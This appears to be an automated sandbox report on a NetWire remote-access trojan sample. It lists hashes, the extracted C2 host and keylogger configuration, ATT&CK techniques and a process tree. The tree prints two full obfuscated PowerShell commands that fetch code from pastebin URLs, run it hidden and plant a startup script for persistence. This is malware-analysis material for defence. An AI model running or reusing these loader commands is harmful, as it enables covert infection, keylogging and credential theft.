netwire | 9a228e0b3c3045347437fea03f4f54029f5ae0d98d48c3e84683a67c4cd36960

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 20:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
Size

401KB
MD5

a07d9930e3a888839daf68ca4486aa4c
SHA1

d608ec0dd8f778f5820fb33720256da28e0db19b
SHA256

c64a54b3d28b6e21f228ce31252ed060cbc4df936ea074bb4926b793dbc97d93
SHA512

bda8cafa576e8e1e30ec0b267a66cfb01c0624339f49ef3dc5901d9ad39b8ca94d813141de49a52956112641b73273121c3c0349e695439748ddfabe71606b7a
SSDEEP

12288:7ANwRo+mv8QD4+0V16caYp4SfTgM/gBNkcbma:7AT8QE+kvlfTgTBNkcX

Score

10^/10

netwire botnet discovery execution rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/cjNL9r6c

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/UQ6WhkQb

Extracted

Family

netwire

alice2019.myftp.biz:3360

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
OSCARO2021
keylogger_dir
%AppData%\Logs\
lock_executable
false
offline_keylogger
true
password
Password
registry_autorun
false
use_mutex
false

Signatures

NetWire RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/1096-131-0x0000000000400000-0x000000000042B000-memory.dmp	netwire
behavioral2/memory/2288-133-0x0000000000400000-0x000000000042B000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Netwire family
netwire

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4048	powershell.exe
10	2796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4048	powershell.exe
2796	powershell.exe
4508	powershell.exe
3964	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4044	Setup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	pastebin.com
9	pastebin.com
10	pastebin.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4508 set thread context of 1096	4508	powershell.exe	109
PID 3964 set thread context of 2288	3964	powershell.exe	110

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Setup.exe	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
File opened for modification	C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Uninstall.exe	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
File created	C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Uninstall.ini	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2796	powershell.exe
4048	powershell.exe
4048	powershell.exe
2796	powershell.exe
4508	powershell.exe
3964	powershell.exe
4508	powershell.exe
3964	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4044	Setup.exe
4044	Setup.exe
4044	Setup.exe
4044	Setup.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 2228	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	83
PID 3028 wrote to memory of 2228	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	83
PID 3028 wrote to memory of 2228	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	83
PID 2228 wrote to memory of 900	2228	WScript.exe	84
PID 2228 wrote to memory of 900	2228	WScript.exe	84
PID 2228 wrote to memory of 900	2228	WScript.exe	84
PID 3028 wrote to memory of 3972	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	87
PID 3028 wrote to memory of 3972	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	87
PID 3028 wrote to memory of 3972	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	87
PID 900 wrote to memory of 4048	900	cmd.exe	88
PID 900 wrote to memory of 4048	900	cmd.exe	88
PID 900 wrote to memory of 4048	900	cmd.exe	88
PID 3972 wrote to memory of 1028	3972	WScript.exe	89
PID 3972 wrote to memory of 1028	3972	WScript.exe	89
PID 3972 wrote to memory of 1028	3972	WScript.exe	89
PID 3028 wrote to memory of 4044	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	91
PID 3028 wrote to memory of 4044	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	91
PID 3028 wrote to memory of 4044	3028	C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe	91
PID 1028 wrote to memory of 2796	1028	cmd.exe	92
PID 1028 wrote to memory of 2796	1028	cmd.exe	92
PID 1028 wrote to memory of 2796	1028	cmd.exe	92
PID 2796 wrote to memory of 4508	2796	powershell.exe	101
PID 2796 wrote to memory of 4508	2796	powershell.exe	101
PID 2796 wrote to memory of 4508	2796	powershell.exe	101
PID 4048 wrote to memory of 3964	4048	powershell.exe	102
PID 4048 wrote to memory of 3964	4048	powershell.exe	102
PID 4048 wrote to memory of 3964	4048	powershell.exe	102
PID 4508 wrote to memory of 552	4508	powershell.exe	105
PID 4508 wrote to memory of 552	4508	powershell.exe	105
PID 4508 wrote to memory of 552	4508	powershell.exe	105
PID 3964 wrote to memory of 4484	3964	powershell.exe	106
PID 3964 wrote to memory of 4484	3964	powershell.exe	106
PID 3964 wrote to memory of 4484	3964	powershell.exe	106
PID 552 wrote to memory of 4000	552	csc.exe	107
PID 552 wrote to memory of 4000	552	csc.exe	107
PID 552 wrote to memory of 4000	552	csc.exe	107
PID 4484 wrote to memory of 4488	4484	csc.exe	108
PID 4484 wrote to memory of 4488	4484	csc.exe	108
PID 4484 wrote to memory of 4488	4484	csc.exe	108
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 4508 wrote to memory of 1096	4508	powershell.exe	109
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110
PID 3964 wrote to memory of 2288	3964	powershell.exe	110

C:\Users\Admin\AppData\Local\Temp\C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe
"C:\Users\Admin\AppData\Local\Temp\C64A54B3D28B6E21F228CE31252ED060CBC4DF936EA074BB4926B793DBC97D93.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\RoamingIDXXFGHFTY1.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:900
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,99,106,78,76,57,114,54,99,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3964
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fskg04zq\fskg04zq.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4484
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2854.tmp" "c:\Users\Admin\AppData\Local\Temp\fskg04zq\CSC7190A73321A421EA83828FBD6279AED.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4488
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDE§!NCTRV12.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,85,81,54,87,104,107,81,98,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4508
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ow0drlxv\ow0drlxv.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2853.tmp" "c:\Users\Admin\AppData\Local\Temp\ow0drlxv\CSC23D2D19B7D14ABAACFB8C1633C7FEBC.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4000
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1096
- C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Setup.exe
  "C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe Systems Incorporated\Setup.exe\Setup.exe

Filesize
453KB

MD5
96f7cb9f7481a279bd4bc0681a3b993e

SHA1
deaedb5becc6c0bd263d7cf81e0909b912a1afd4

SHA256
d2893c55259772b554cb887d3e2e1f9c67f5cd5abac2ab9f4720dec507cdd290

SHA512
694d2da36df04db25cc5972f7cc180b77e1cb0c3b5be8b69fe7e2d4e59555efb8aa7e50b1475ad5196ca638dabde2c796ae6faeb4a31f38166838cd1cc028149

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9124e0eaa9674951a92d70093ede08b9

SHA1
5cee26e3f688f83dce0512efbc4554129323a318

SHA256
2eb194bb2d884725ab8bc85355d7d842be3a3c331d9ed38d52e983b3e1bb5b16

SHA512
273c576789ffe16a80593fe9059611ab5bc28ea76c73ae28ae654760e863b30209812ec4f406b59e3f4c6571e6f9de6184b6241e4f24c026da97e7b329e824cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
18b8bbeef8ea22389b8eaeed7830a3f7

SHA1
4e92a6228b914eea290dc7a866966693032253c5

SHA256
d7b2c993cd10f1fbee96a8e529f37cd93bbc9b81b0f42c482359248906ee3c51

SHA512
091e266f9e096931b710c5b31994780d0e5392393e27519badd06767344204ccc4ddde11ed445ec61526248162687be54f21f7ca58735c7c26665d3863e8ead5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
4KB

MD5
22d598ba1d3f03b09d18dfe21e64b19c

SHA1
56bd271a0a61fc114502dd7e795b58fc3b273b0a

SHA256
e478539cd951c493914a6f7a993b6fa6293b5c72a7615dd7e0658c22cdee2890

SHA512
f408b353b2d10a6f71ec156436e8d6925566f331acbd1435f2985d80fc3217465fa560bd7efb9316d7ad6b69783c4d345f3ecd2f927ae6a57c49df7926022c96

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
4KB

MD5
05ece7ab2b58d590718f80be511e1c17

SHA1
539845c383223c1d3f821fdc0a58eb54b22384e7

SHA256
51dec5e2d626c499ac4d8000e12dccd067cb1a2ea90806b856a656017d0e96ab

SHA512
